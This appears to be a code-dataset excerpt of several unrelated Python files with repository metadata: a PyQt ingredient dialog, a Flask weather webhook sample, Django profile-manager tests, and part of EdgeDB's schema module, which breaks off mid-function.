self.LEHandadd3.setMinimumSize(QtCore.QSize(0, 28))
self.LEHandadd3.setMaximumSize(QtCore.QSize(100, 28))
font = QtGui.QFont()
font.setPointSize(14)
self.LEHandadd3.setFont(font)
self.LEHandadd3.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.LEHandadd3.setObjectName("LEHandadd3")
self.verticalLayout_5.addWidget(self.LEHandadd3)
self.LEHandadd4 = ClickableLineEdit(handadds)
self.LEHandadd4.setMinimumSize(QtCore.QSize(0, 28))
self.LEHandadd4.setMaximumSize(QtCore.QSize(100, 28))
font = QtGui.QFont()
font.setPointSize(14)
self.LEHandadd4.setFont(font)
self.LEHandadd4.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.LEHandadd4.setObjectName("LEHandadd4")
self.verticalLayout_5.addWidget(self.LEHandadd4)
self.LEHandadd5 = ClickableLineEdit(handadds)
self.LEHandadd5.setMinimumSize(QtCore.QSize(0, 28))
self.LEHandadd5.setMaximumSize(QtCore.QSize(100, 28))
font = QtGui.QFont()
font.setPointSize(14)
self.LEHandadd5.setFont(font)
self.LEHandadd5.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.LEHandadd5.setObjectName("LEHandadd5")
self.verticalLayout_5.addWidget(self.LEHandadd5)
self.horizontalLayout.addLayout(self.verticalLayout_5)
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.label_11 = QtWidgets.QLabel(handadds)
self.label_11.setMinimumSize(QtCore.QSize(60, 0))
self.label_11.setMaximumSize(QtCore.QSize(60, 28))
font = QtGui.QFont()
font.setPointSize(18)
font.setBold(False)
font.setWeight(50)
self.label_11.setFont(font)
self.label_11.setObjectName("label_11")
self.verticalLayout_3.addWidget(self.label_11)
self.label_12 = QtWidgets.QLabel(handadds)
self.label_12.setMinimumSize(QtCore.QSize(60, 0))
self.label_12.setMaximumSize(QtCore.QSize(60, 28))
font = QtGui.QFont()
font.setPointSize(18)
font.setBold(False)
font.setWeight(50)
self.label_12.setFont(font)
self.label_12.setObjectName("label_12")
self.verticalLayout_3.addWidget(self.label_12)
self.label_13 = QtWidgets.QLabel(handadds)
self.label_13.setMinimumSize(QtCore.QSize(60, 0))
self.label_13.setMaximumSize(QtCore.QSize(60, 28))
font = QtGui.QFont()
font.setPointSize(18)
font.setBold(False)
font.setWeight(50)
self.label_13.setFont(font)
self.label_13.setObjectName("label_13")
self.verticalLayout_3.addWidget(self.label_13)
self.label_15 = QtWidgets.QLabel(handadds)
self.label_15.setMinimumSize(QtCore.QSize(60, 0))
self.label_15.setMaximumSize(QtCore.QSize(60, 28))
font = QtGui.QFont()
font.setPointSize(18)
font.setBold(False)
font.setWeight(50)
self.label_15.setFont(font)
self.label_15.setObjectName("label_15")
self.verticalLayout_3.addWidget(self.label_15)
self.label_14 = QtWidgets.QLabel(handadds)
self.label_14.setMinimumSize(QtCore.QSize(60, 0))
self.label_14.setMaximumSize(QtCore.QSize(60, 28))
font = QtGui.QFont()
font.setPointSize(18)
font.setBold(False)
font.setWeight(50)
self.label_14.setFont(font)
self.label_14.setObjectName("label_14")
self.verticalLayout_3.addWidget(self.label_14)
self.horizontalLayout.addLayout(self.verticalLayout_3)
self.verticalLayout.addLayout(self.horizontalLayout)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.PBEintragen = QtWidgets.QPushButton(handadds)
self.PBEintragen.setMinimumSize(QtCore.QSize(200, 40))
self.PBEintragen.setMaximumSize(QtCore.QSize(200, 16777215))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.PBEintragen.setFont(font)
self.PBEintragen.setObjectName("PBEintragen")
self.horizontalLayout_2.addWidget(self.PBEintragen)
self.PBAbbrechen = QtWidgets.QPushButton(handadds)
self.PBAbbrechen.setMinimumSize(QtCore.QSize(0, 40))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.PBAbbrechen.setFont(font)
self.PBAbbrechen.setObjectName("PBAbbrechen")
self.horizontalLayout_2.addWidget(self.PBAbbrechen)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.retranslateUi(handadds)
QtCore.QMetaObject.connectSlotsByName(handadds)
def retranslateUi(self, handadds):
_translate = QtCore.QCoreApplication.translate
handadds.setWindowTitle(_translate("handadds", "Zutaten zum selbst hinzufügen"))
self.LHeader.setText(_translate("handadds", "Ingredients for hand add"))
self.LHeader.setProperty("cssClass", _translate("handadds", "secondary"))
self.LEHandadd1.setProperty("cssClass", _translate("handadds", "secondary"))
self.LEHandadd2.setProperty("cssClass", _translate("handadds", "secondary"))
self.LEHandadd3.setProperty("cssClass", _translate("handadds", "secondary"))
self.LEHandadd4.setProperty("cssClass", _translate("handadds", "secondary"))
self.LEHandadd5.setProperty("cssClass", _translate("handadds", "secondary"))
self.label_11.setText(_translate("handadds", "ml"))
self.label_12.setText(_translate("handadds", "ml"))
self.label_13.setText(_translate("handadds", "ml"))
self.label_15.setText(_translate("handadds", "ml"))
self.label_14.setText(_translate("handadds", "ml"))
self.PBEintragen.setText(_translate("handadds", "Eintragen"))
self.PBEintragen.setProperty("cssClass", _translate("handadds", "btn-inverted"))
self.PBAbbrechen.setText(_translate("handadds", "Abbrechen"))
from src.ui_elements.clickablelineedit import ClickableLineEdit
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
handadds = QtWidgets.QDialog()
ui = Ui_handadds()
ui.setupUi(handadds)
handadds.show()
sys.exit(app.exec_())
| 46.419355 | 105 | 0.691105 |
acfb6118c412a1d00d79c1f65100746a99557f3a | 40 | py | Python | singlebar/__init__.py | ericedem/singlebar | 81d5f517284b64e838706d7ac168f8a700afe57c | [
"MIT"
] | null | null | null | singlebar/__init__.py | ericedem/singlebar | 81d5f517284b64e838706d7ac168f8a700afe57c | [
"MIT"
] | 1 | 2016-05-11T17:06:39.000Z | 2016-05-11T17:06:39.000Z | singlebar/__init__.py | ericedem/singlebar | 81d5f517284b64e838706d7ac168f8a700afe57c | [
"MIT"
] | null | null | null | from .core import start, update, finish
| 20 | 39 | 0.775 |
acfb6184ac74931b91a80ca7228caf530de28307 | 4,835 | py | Python | app.py | vikasGhildiyal/apiai-python-webhook | a29f7b795c3c60dd5eef7a951b9b7c5b0b1b3667 | [
"Apache-2.0"
] | null | null | null | app.py | vikasGhildiyal/apiai-python-webhook | a29f7b795c3c60dd5eef7a951b9b7c5b0b1b3667 | [
"Apache-2.0"
] | null | null | null | app.py | vikasGhildiyal/apiai-python-webhook | a29f7b795c3c60dd5eef7a951b9b7c5b0b1b3667 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
#res = processRequest(req)
res={
"speech": "cold",
"displayText": "cold",
"data": {"slack": slack_message, "facebook": facebook_message},
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
if req.get("result").get("action") != "yahooWeatherForecast":
return {}
baseurl = "https://query.yahooapis.com/v1/public/yql?"
yql_query = makeYqlQuery(req)
if yql_query is None:
return {}
yql_url = baseurl + urllib.urlencode({'q': yql_query}) + "&format=json"
print(yql_url)
result = urllib.urlopen(yql_url).read()
print("yql result: ")
print(result)
data = json.loads(result)
res = makeWebhookResult(data)
return res
def makeYqlQuery(req):
result = req.get("result")
parameters = result.get("parameters")
city = parameters.get("geo-city")
if city is None:
return None
return "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text='" + city + "')"
def makeWebhookResult(data):
query = data.get('query')
if query is None:
return {}
result = query.get('results')
if result is None:
return {}
channel = result.get('channel')
if channel is None:
return {}
item = channel.get('item')
location = channel.get('location')
units = channel.get('units')
if (location is None) or (item is None) or (units is None):
return {}
condition = item.get('condition')
if condition is None:
return {}
# print(json.dumps(item, indent=4))
speech = "Today in " + location.get('city') + ": " + condition.get('text') + \
", the temperature is " + condition.get('temp') + " " + units.get('temperature')
print("Response:")
print(speech)
slack_message = {
"text": speech,
"attachments": [
{
"title": channel.get('title'),
"title_link": channel.get('link'),
"color": "#36a64f",
"fields": [
{
"title": "Condition",
"value": "Temp " + condition.get('temp') +
" " + units.get('temperature'),
"short": "false"
},
{
"title": "Wind",
"value": "Speed: " + channel.get('wind').get('speed') +
", direction: " + channel.get('wind').get('direction'),
"short": "true"
},
{
"title": "Atmosphere",
"value": "Humidity " + channel.get('atmosphere').get('humidity') +
" pressure " + channel.get('atmosphere').get('pressure'),
"short": "true"
}
],
"thumb_url": "http://l.yimg.com/a/i/us/we/52/" + condition.get('code') + ".gif"
}
]
}
facebook_message = {
"attachment": {
"type": "template",
"payload": {
"template_type": "generic",
"elements": [
{
"title": channel.get('title'),
"image_url": "http://l.yimg.com/a/i/us/we/52/" + condition.get('code') + ".gif",
"subtitle": speech,
"buttons": [
{
"type": "web_url",
"url": channel.get('link'),
"title": "View Details"
}
]
}
]
}
}
}
print(json.dumps(slack_message))
return {
"speech": speech,
"displayText": speech,
"data": {"slack": slack_message, "facebook": facebook_message},
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print "Starting app on port %d" % port
app.run(debug=False, port=port, host='0.0.0.0')
| 28.110465 | 118 | 0.479421 |
acfb61bc40d5431471069c61ee3172c95da75dde | 6,637 | py | Python | tests/seahub/profile/models/test_profile_manager.py | xiez/seahub | 8dfaa726e804afdf27e0b530de3e127b1654a7e3 | [
"Apache-2.0"
] | null | null | null | tests/seahub/profile/models/test_profile_manager.py | xiez/seahub | 8dfaa726e804afdf27e0b530de3e127b1654a7e3 | [
"Apache-2.0"
] | null | null | null | tests/seahub/profile/models/test_profile_manager.py | xiez/seahub | 8dfaa726e804afdf27e0b530de3e127b1654a7e3 | [
"Apache-2.0"
] | null | null | null | from seahub.profile.models import Profile
from seahub.test_utils import BaseTestCase
class ProfileManagerTest(BaseTestCase):
def setUp(self):
pass
def test_get_username_by_contact_email(self):
assert Profile.objects.get_username_by_contact_email('a@a.com') is None
user1 = self.user.username
Profile.objects.add_or_update(user1, contact_email='a@a.com')
assert Profile.objects.get_username_by_contact_email('a@a.com') == user1
user2 = self.admin.username
Profile.objects.add_or_update(user2, contact_email='a@a.com')
assert Profile.objects.get_username_by_contact_email('a@a.com') is None
def test_convert_login_str_to_username(self):
s = Profile.objects
assert s.convert_login_str_to_username('a@a.com') == 'a@a.com'
Profile.objects.add_or_update(username='a@a.com', login_id='aaa')
assert s.convert_login_str_to_username('a@a.com') == 'a@a.com'
assert s.convert_login_str_to_username('aaa') == 'a@a.com'
Profile.objects.add_or_update(username='a@a.com', contact_email='a+1@a.com')
assert s.convert_login_str_to_username('a@a.com') == 'a@a.com'
assert s.convert_login_str_to_username('aaa') == 'a@a.com'
assert s.convert_login_str_to_username('a+1@a.com') == 'a@a.com'
def test_get_contact_email_by_user(self):
# no profile for user, contact email should be username
username = self.user.username
assert username == Profile.objects.get_contact_email_by_user(username)
# user has profile, but no contact email, contact email should be username
p = Profile.objects.add_or_update(username, 'nickname')
assert username == Profile.objects.get_contact_email_by_user(username)
# user has profile, and have contact email
p.contact_email = 'contact@foo.com'
p.save()
assert 'contact@foo.com' == Profile.objects.get_contact_email_by_user(username)
def test_add_or_update(self):
username = self.user.username
profiles = Profile.objects.filter(user=username)
for profile in profiles:
profile.delete()
profile = Profile.objects.add_or_update(username, 'nickname',
intro='hello', lang_code='ch',
login_id=username,
contact_email=username,
institution='test')
assert profile.nickname == 'nickname'
assert profile.user == username
assert profile.intro == 'hello'
assert profile.lang_code == 'ch'
assert profile.login_id == username
assert profile.contact_email == username
assert profile.institution == 'test'
# test whether other will be changed when some one updated
profile = Profile.objects.add_or_update(username, 'nick')
assert profile.nickname == 'nick'
assert profile.user == username
assert profile.intro == 'hello'
assert profile.lang_code == 'ch'
assert profile.login_id == username
assert profile.contact_email == username
assert profile.institution == 'test'
profile = Profile.objects.add_or_update(username, intro='intro')
assert profile.nickname == 'nick'
assert profile.user == username
assert profile.intro == 'intro'
assert profile.lang_code == 'ch'
assert profile.login_id == username
assert profile.contact_email == username
assert profile.institution == 'test'
profile = Profile.objects.add_or_update(username, lang_code='en')
assert profile.nickname == 'nick'
assert profile.user == username
assert profile.intro == 'intro'
assert profile.lang_code == 'en'
assert profile.login_id == username
assert profile.contact_email == username
assert profile.institution == 'test'
profile = Profile.objects.add_or_update(username, login_id='test@test.com')
assert profile.nickname == 'nick'
assert profile.user == username
assert profile.intro == 'intro'
assert profile.lang_code == 'en'
assert profile.login_id == 'test@test.com'
assert profile.contact_email == username
assert profile.institution == 'test'
profile = Profile.objects.add_or_update(username, contact_email='test@contact.com')
assert profile.nickname == 'nick'
assert profile.user == username
assert profile.intro == 'intro'
assert profile.lang_code == 'en'
assert profile.login_id == 'test@test.com'
assert profile.contact_email == 'test@contact.com'
assert profile.institution == 'test'
profile = Profile.objects.add_or_update(username, institution='insti')
assert profile.nickname == 'nick'
assert profile.user == username
assert profile.intro == 'intro'
assert profile.lang_code == 'en'
assert profile.login_id == 'test@test.com'
assert profile.contact_email == 'test@contact.com'
assert profile.institution == 'insti'
def test_add_or_update_with_empty(self):
username = self.user.username
profiles = Profile.objects.filter(user=username)
for profile in profiles:
profile.delete()
profile = Profile.objects.add_or_update(username, 'nickname',
intro='hello', lang_code='ch',
login_id=username,
contact_email=username,
institution='test')
assert profile.nickname == 'nickname'
assert profile.user == username
assert profile.intro == 'hello'
assert profile.lang_code == 'ch'
assert profile.login_id == username
assert profile.contact_email == username
assert profile.institution == 'test'
profile = Profile.objects.add_or_update(username, '')
assert profile.nickname == ''
profile = Profile.objects.add_or_update(username, intro='')
assert profile.intro == ''
profile = Profile.objects.add_or_update(username, lang_code='')
assert profile.lang_code == ''
profile = Profile.objects.add_or_update(username, login_id='')
assert profile.login_id == ''
profile = Profile.objects.add_or_update(username, contact_email='')
assert profile.contact_email == ''
| 43.097403 | 91 | 0.627091 |
acfb620e4861cbb29c105c8b90402f1b27f6843e | 707 | py | Python | model/3-after-feature-selection/main.py | fortyTwo102/bioinformatics | e7a4d9753ae446a45d5a293aa28396fd5e798789 | [
"Apache-2.0"
] | null | null | null | model/3-after-feature-selection/main.py | fortyTwo102/bioinformatics | e7a4d9753ae446a45d5a293aa28396fd5e798789 | [
"Apache-2.0"
] | null | null | null | model/3-after-feature-selection/main.py | fortyTwo102/bioinformatics | e7a4d9753ae446a45d5a293aa28396fd5e798789 | [
"Apache-2.0"
] | null | null | null | import pandas as pd
import numpy as np
from sklearn.metrics import accuracy_score, f1_score
from sklearn.model_selection import train_test_split
from itertools import combinations
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
X_train = pd.read_csv('X_train_best.csv')
X_test = pd.read_csv('X_test_best.csv')
y_train = pd.read_csv('y_train.csv').values.ravel()
y_test = pd.read_csv('y_test.csv').values.ravel()
model = LogisticRegression(random_state = 2, max_iter = 10000)
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
acc = round(accuracy_score(y_pred, y_test)*100,2)
f1 = round(f1_score(y_test, y_pred)*100,2)
print(acc, f1) # 78.08 40.74
| 22.806452 | 62 | 0.779349 |
acfb624af6b576f5e08c44b60c99a52d82d66fef | 62,806 | py | Python | edb/schema/schema.py | jamilabreu/edgedb | 6d3f222e4c5d3300f483b4e06e8f747c6381f313 | [
"Apache-2.0"
] | null | null | null | edb/schema/schema.py | jamilabreu/edgedb | 6d3f222e4c5d3300f483b4e06e8f747c6381f313 | [
"Apache-2.0"
] | null | null | null | edb/schema/schema.py | jamilabreu/edgedb | 6d3f222e4c5d3300f483b4e06e8f747c6381f313 | [
"Apache-2.0"
] | null | null | null | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import abc
import collections
import functools
import itertools
import immutables as immu
from edb import errors
from edb.common import english
from . import casts as s_casts
from . import functions as s_func
from . import migrations as s_migrations
from . import modules as s_mod
from . import name as sn
from . import objects as so
from . import operators as s_oper
from . import pseudo as s_pseudo
from . import types as s_types
if TYPE_CHECKING:
import uuid
from edb.common import parsing
Refs_T = immu.Map[
uuid.UUID,
immu.Map[
Tuple[Type[so.Object], str],
immu.Map[uuid.UUID, None],
],
]
STD_MODULES = (
sn.UnqualName('std'),
sn.UnqualName('schema'),
sn.UnqualName('math'),
sn.UnqualName('sys'),
sn.UnqualName('cfg'),
sn.UnqualName('cal'),
)
# Specifies the order of processing of files and directories in lib/
STD_SOURCES = (
sn.UnqualName('std'),
sn.UnqualName('schema'),
sn.UnqualName('math'),
sn.UnqualName('sys'),
sn.UnqualName('cfg'),
sn.UnqualName('cal'),
sn.UnqualName('ext'),
)
Schema_T = TypeVar('Schema_T', bound='Schema')
class Schema(abc.ABC):
@abc.abstractmethod
def add_raw(
self: Schema_T,
id: uuid.UUID,
sclass: Type[so.Object],
data: Tuple[Any, ...],
) -> Schema_T:
raise NotImplementedError
@abc.abstractmethod
def add(
self: Schema_T,
id: uuid.UUID,
sclass: Type[so.Object],
data: Tuple[Any, ...],
) -> Schema_T:
raise NotImplementedError
@abc.abstractmethod
def discard(self: Schema_T, obj: so.Object) -> Schema_T:
raise NotImplementedError
@abc.abstractmethod
def delete(self: Schema_T, obj: so.Object) -> Schema_T:
raise NotImplementedError
@abc.abstractmethod
def update_obj(
self: Schema_T,
obj: so.Object,
updates: Mapping[str, Any],
) -> Schema_T:
raise NotImplementedError
@abc.abstractmethod
def maybe_get_obj_data_raw(
self,
obj: so.Object,
) -> Optional[Tuple[Any, ...]]:
raise NotImplementedError
@abc.abstractmethod
def get_obj_data_raw(
self,
obj: so.Object,
) -> Tuple[Any, ...]:
raise NotImplementedError
@abc.abstractmethod
def set_obj_field(
self: Schema_T,
obj: so.Object,
field: str,
value: Any,
) -> Schema_T:
raise NotImplementedError
@abc.abstractmethod
def unset_obj_field(
self: Schema_T,
obj: so.Object,
field: str,
) -> Schema_T:
raise NotImplementedError
@abc.abstractmethod
def get_functions(
self,
name: Union[str, sn.Name],
default: Union[
Tuple[s_func.Function, ...], so.NoDefaultT
] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
) -> Tuple[s_func.Function, ...]:
raise NotImplementedError
@abc.abstractmethod
def get_operators(
self,
name: Union[str, sn.Name],
default: Union[
Tuple[s_oper.Operator, ...], so.NoDefaultT
] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
) -> Tuple[s_oper.Operator, ...]:
raise NotImplementedError
@abc.abstractmethod
def get_casts_to_type(
self,
to_type: s_types.Type,
*,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
raise NotImplementedError
@abc.abstractmethod
def get_casts_from_type(
self,
from_type: s_types.Type,
*,
implicit: bool = False,
assignment: bool = False,
) -> FrozenSet[s_casts.Cast]:
raise NotImplementedError
@overload
def get_referrers(
self,
scls: so.Object,
*,
scls_type: Type[so.Object_T],
field_name: Optional[str] = None,
) -> FrozenSet[so.Object_T]:
...
@overload
def get_referrers( # NoQA: F811
self,
scls: so.Object,
*,
scls_type: None = None,
field_name: Optional[str] = None,
) -> FrozenSet[so.Object]:
...
@abc.abstractmethod
def get_referrers( # NoQA: F811
self,
scls: so.Object,
*,
scls_type: Optional[Type[so.Object_T]] = None,
field_name: Optional[str] = None,
) -> FrozenSet[so.Object_T]:
raise NotImplementedError
@abc.abstractmethod
def get_referrers_ex(
self,
scls: so.Object,
*,
scls_type: Optional[Type[so.Object_T]] = None,
) -> Dict[
Tuple[Type[so.Object_T], str],
FrozenSet[so.Object_T],
]:
raise NotImplementedError
@overload
def get_by_id(
self,
obj_id: uuid.UUID,
default: Union[so.Object, so.NoDefaultT] = so.NoDefault,
*,
type: None = None,
) -> so.Object:
...
@overload
def get_by_id( # NoQA: F811
self,
obj_id: uuid.UUID,
default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
*,
type: Optional[Type[so.Object_T]] = None,
) -> so.Object_T:
...
@overload
def get_by_id( # NoQA: F811
self,
obj_id: uuid.UUID,
default: None = None,
*,
type: Optional[Type[so.Object_T]] = None,
) -> Optional[so.Object_T]:
...
def get_by_id( # NoQA: F811
self,
obj_id: uuid.UUID,
default: Union[so.Object_T, so.NoDefaultT, None] = so.NoDefault,
*,
type: Optional[Type[so.Object_T]] = None,
) -> Optional[so.Object_T]:
return self._get_by_id(obj_id, default, type=type)
@abc.abstractmethod
def _get_by_id(
self,
obj_id: uuid.UUID,
default: Union[so.Object_T, so.NoDefaultT, None],
*,
type: Optional[Type[so.Object_T]],
) -> Optional[so.Object_T]:
raise NotImplementedError
@overload
def get_global(
self,
objtype: Type[so.Object_T],
name: Union[str, sn.Name],
default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
) -> so.Object_T:
...
@overload
def get_global( # NoQA: F811
self,
objtype: Type[so.Object_T],
name: Union[str, sn.Name],
default: None = None,
) -> Optional[so.Object_T]:
...
def get_global( # NoQA: F811
self,
objtype: Type[so.Object_T],
name: Union[str, sn.Name],
default: Union[so.Object_T, so.NoDefaultT, None] = so.NoDefault,
) -> Optional[so.Object_T]:
return self._get_global(objtype, name, default)
@abc.abstractmethod
def _get_global(
self,
objtype: Type[so.Object_T],
name: Union[str, sn.Name],
default: Union[so.Object_T, so.NoDefaultT, None],
) -> Optional[so.Object_T]:
raise NotImplementedError
@overload
def get( # NoQA: F811
self,
name: Union[str, sn.Name],
default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
condition: Optional[Callable[[so.Object], bool]] = None,
label: Optional[str] = None,
sourcectx: Optional[parsing.ParserContext] = None,
) -> so.Object:
...
@overload
def get( # NoQA: F811
self,
name: Union[str, sn.Name],
default: None,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
condition: Optional[Callable[[so.Object], bool]] = None,
label: Optional[str] = None,
sourcectx: Optional[parsing.ParserContext] = None,
) -> Optional[so.Object]:
...
@overload
def get( # NoQA: F811
self,
name: Union[str, sn.Name],
default: Union[so.Object_T, so.NoDefaultT] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
type: Type[so.Object_T],
condition: Optional[Callable[[so.Object], bool]] = None,
label: Optional[str] = None,
sourcectx: Optional[parsing.ParserContext] = None,
) -> so.Object_T:
...
@overload
def get( # NoQA: F811
self,
name: Union[str, sn.Name],
default: None,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
type: Type[so.Object_T],
condition: Optional[Callable[[so.Object], bool]] = None,
label: Optional[str] = None,
sourcectx: Optional[parsing.ParserContext] = None,
) -> Optional[so.Object_T]:
...
@overload
def get( # NoQA: F811
self,
name: Union[str, sn.Name],
default: Union[so.Object, so.NoDefaultT, None] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
type: Optional[Type[so.Object_T]] = None,
condition: Optional[Callable[[so.Object], bool]] = None,
label: Optional[str] = None,
sourcectx: Optional[parsing.ParserContext] = None,
) -> Optional[so.Object]:
...
def get( # NoQA: F811
self,
name: Union[str, sn.Name],
default: Union[so.Object, so.NoDefaultT, None] = so.NoDefault,
*,
module_aliases: Optional[Mapping[Optional[str], str]] = None,
type: Optional[Type[so.Object_T]] = None,
condition: Optional[Callable[[so.Object], bool]] = None,
label: Optional[str] = None,
sourcectx: Optional[parsing.ParserContext] = None,
) -> Optional[so.Object]:
return self._get(
name,
default,
module_aliases=module_aliases,
type=type,
condition=condition,
label=label,
sourcectx=sourcectx,
)
@abc.abstractmethod
def _get( # NoQA: F811
self,
name: Union[str, sn.Name],
default: Union[so.Object, so.NoDefaultT, None],
*,
module_aliases: Optional[Mapping[Optional[str], str]],
type: Optional[Type[so.Object_T]],
condition: Optional[Callable[[so.Object], bool]],
label: Optional[str],
sourcectx: Optional[parsing.ParserContext],
) -> Optional[so.Object]:
raise NotImplementedError
@abc.abstractmethod
def has_object(self, object_id: uuid.UUID) -> bool:
raise NotImplementedError
@abc.abstractmethod
def has_module(self, module: str) -> bool:
raise NotImplementedError
def get_children(
self,
scls: so.Object_T,
) -> FrozenSet[so.Object_T]:
# Ideally get_referrers needs to be made generic via
# an overload on scls_type, but mypy crashes on that.
return self.get_referrers(
scls,
scls_type=type(scls),
field_name='bases',
)
def get_descendants(
self,
scls: so.Object_T,
) -> FrozenSet[so.Object_T]:
return self.get_referrers(
scls, scls_type=type(scls), field_name='ancestors')
@abc.abstractmethod
def get_objects(
self,
*,
exclude_stdlib: bool = False,
exclude_global: bool = False,
exclude_internal: bool = True,
included_modules: Optional[Iterable[sn.Name]] = None,
excluded_modules: Optional[Iterable[sn.Name]] = None,
included_items: Optional[Iterable[sn.Name]] = None,
excluded_items: Optional[Iterable[sn.Name]] = None,
type: Optional[Type[so.Object_T]] = None,
extra_filters: Iterable[Callable[[Schema, so.Object], bool]] = (),
) -> SchemaIterator[so.Object_T]:
raise NotImplementedError
@abc.abstractmethod
def get_modules(self) -> Tuple[s_mod.Module, ...]:
raise NotImplementedError
@abc.abstractmethod
def get_last_migration(self) -> Optional[s_migrations.Migration]:
raise NotImplementedError
class FlatSchema(Schema):
_id_to_data: immu.Map[uuid.UUID, Tuple[Any, ...]]
_id_to_type: immu.Map[uuid.UUID, str]
_name_to_id: immu.Map[sn.Name, uuid.UUID]
_shortname_to_id: immu.Map[
Tuple[Type[so.Object], sn.Name],
FrozenSet[uuid.UUID],
]
_globalname_to_id: immu.Map[
Tuple[Type[so.Object], sn.Name],
uuid.UUID,
]
_refs_to: Refs_T
_generation: int
def __init__(self) -> None:
self._id_to_data = immu.Map()
self._id_to_type = immu.Map()
self._shortname_to_id = immu.Map()
self._name_to_id = immu.Map()
self._globalname_to_id = immu.Map()
self._refs_to = immu.Map()
self._generation = 0
def _replace(
self,
*,
id_to_data: Optional[immu.Map[uuid.UUID, Tuple[Any, ...]]] = None,
id_to_type: Optional[immu.Map[uuid.UUID, str]] = None,
name_to_id: Optional[immu.Map[sn.Name, uuid.UUID]] = None,
shortname_to_id: Optional[
immu.Map[
Tuple[Type[so.Object], sn.Name],
FrozenSet[uuid.UUID]
]
],
globalname_to_id: Optional[
immu.Map[Tuple[Type[so.Object], sn.Name], uuid.UUID]
],
refs_to: Optional[Refs_T] = None,
) -> FlatSchema:
new = FlatSchema.__new__(FlatSchema)
if id_to_data is None:
new._id_to_data = self._id_to_data
else:
new._id_to_data = id_to_data
if id_to_type is None:
new._id_to_type = self._id_to_type
else:
new._id_to_type = id_to_type
if name_to_id is None:
new._name_to_id = self._name_to_id
else:
new._name_to_id = name_to_id
if shortname_to_id is None:
new._shortname_to_id = self._shortname_to_id
else:
new._shortname_to_id = shortname_to_id
if globalname_to_id is None:
new._globalname_to_id = self._globalname_to_id
else:
new._globalname_to_id = globalname_to_id
if refs_to is None:
new._refs_to = self._refs_to
else:
new._refs_to = refs_to
new._generation = self._generation + 1
return new # type: ignore
def _update_obj_name(
self,
obj_id: uuid.UUID,
sclass: Type[so.Object],
old_name: Optional[sn.Name],
new_name: Optional[sn.Name],
) -> Tuple[
immu.Map[sn.Name, uuid.UUID],
immu.Map[Tuple[Type[so.Object], sn.Name], FrozenSet[uuid.UUID]],
immu.Map[Tuple[Type[so.Object], sn.Name], uuid.UUID],
]:
name_to_id = self._name_to_id
shortname_to_id = self._shortname_to_id
globalname_to_id = self._globalname_to_id
is_global = not issubclass(sclass, so.QualifiedObject)
has_sn_cache = issubclass(sclass, (s_func.Function, s_oper.Operator))
if old_name is not None:
if is_global:
globalname_to_id = globalname_to_id.delete((sclass, old_name))
else:
name_to_id = name_to_id.delete(old_name)
if has_sn_cache:
old_shortname = sn.shortname_from_fullname(old_name)
sn_key = (sclass, old_shortname)
new_ids = shortname_to_id[sn_key] - {obj_id}
if new_ids:
shortname_to_id = shortname_to_id.set(sn_key, new_ids)
else:
shortname_to_id = shortname_to_id.delete(sn_key)
if new_name is not None:
if is_global:
key = (sclass, new_name)
if key in globalname_to_id:
other_obj = self.get_by_id(
globalname_to_id[key], type=so.Object)
vn = other_obj.get_verbosename(self, with_parent=True)
raise errors.SchemaError(
f'{vn} already exists')
globalname_to_id = globalname_to_id.set(key, obj_id)
else:
assert isinstance(new_name, sn.QualName)
if (
not self.has_module(new_name.module)
and new_name.module != '__derived__'
):
raise errors.UnknownModuleError(
f'module {new_name.module!r} is not in this schema')
if new_name in name_to_id:
other_obj = self.get_by_id(
name_to_id[new_name], type=so.Object)
vn = other_obj.get_verbosename(self, with_parent=True)
raise errors.SchemaError(
f'{vn} already exists')
name_to_id = name_to_id.set(new_name, obj_id)
if has_sn_cache:
new_shortname = sn.shortname_from_fullname(new_name)
sn_key = (sclass, new_shortname)
try:
ids = shortname_to_id[sn_key]
except KeyError:
